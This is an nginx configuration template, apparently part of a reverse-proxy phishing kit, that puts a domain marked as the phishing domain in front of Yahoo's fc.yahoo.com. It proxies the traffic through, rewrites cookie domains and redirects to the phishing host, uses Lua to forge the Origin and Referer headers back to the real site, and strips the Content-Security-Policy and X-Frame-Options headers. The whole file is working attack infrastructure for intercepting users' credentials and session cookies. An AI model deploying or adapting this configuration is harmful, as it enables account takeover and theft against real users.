fc.yahoo.com.conf

server {
	listen 80;
	listen 443 ssl;
	
	server_name fc.{{PHISH_DOMAIN}};

	ssl_certificate {{CERT_PUBLIC_PATH}};
	ssl_certificate_key {{CERT_PRIVATE_PATH}};

	ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
	ssl_prefer_server_ciphers on;
	ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';

	if ($scheme = http) {
		return 301 https://$server_name$request_uri;
	}

	location / {
		proxy_pass https://fc.yahoo.com;
		proxy_cookie_domain {{COOKIE_HOST[2]}} fc.{{PHISH_DOMAIN}};
		proxy_redirect https://{{TARGET_HOST[2]}}/ https://fc.{{PHISH_DOMAIN}}/;
		
		proxy_set_header Accept-Encoding "";
		proxy_set_header X-Real-IP $remote_addr;
		proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
		
		access_by_lua_block {
			if ngx.var.http_origin ~= nil then
				val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
				ngx.req.set_header("Origin", val)
			end

			if ngx.var.http_referer ~= nil then
				val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
				ngx.req.set_header("Referer", val)
			end
		}

		header_filter_by_lua_block {
			ngx.header["Content-Security-Policy"] = {}
            ngx.header["X-FRAME-OPTIONS"] = {}
		}
	}
}